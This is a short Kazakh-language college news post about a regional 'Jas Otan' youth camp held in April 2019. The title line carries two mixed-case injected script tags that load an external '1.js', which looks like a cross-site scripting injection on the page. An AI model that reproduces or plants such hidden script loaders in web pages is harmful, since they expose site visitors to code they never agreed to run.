«Jas Otan»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.04.2019
17-18.04.2019 ж. «Жастар жылы» аясында Ақмола облыстық «Nur Otan» партиясы жанындағы «Jas Otan» Жастар қанаты «Discovery Borovoe» ойын сауық-сауықтыру орталығының аумағында Жалынды жастар – Еліміздің жарқын болашағы» атты облыстық лагерь болып өтті. Аталған лагердің басты мақсаты біздің аймақ жастарының консолидация,оқыту және жан-жақты дамуына жағдай жасау. Біздің колледждің атынан ағылшын тілі пәні оқытушысы, (жастар ісі бойынша комитет) ЖІК Аптыкаева Кристина Юрьевна қатысты. Аталған іс-шара ұжымды біріктіруге және жан-жақты дамуына қатысты әртүрлі тренингтерге толы болды. Шешендік шеберлігі өткізілді, онда өз ойыңды тыңдаушыларға дұрыс жеткізуді үйретті. Аталған лагердің бағдарламасы әртүрлі қызықты іс-шараларға толы болды. Қатысушылар ұйымдастырушылармен бірге жемісті жұмыс жасады және көптеген жақсы энергия алды.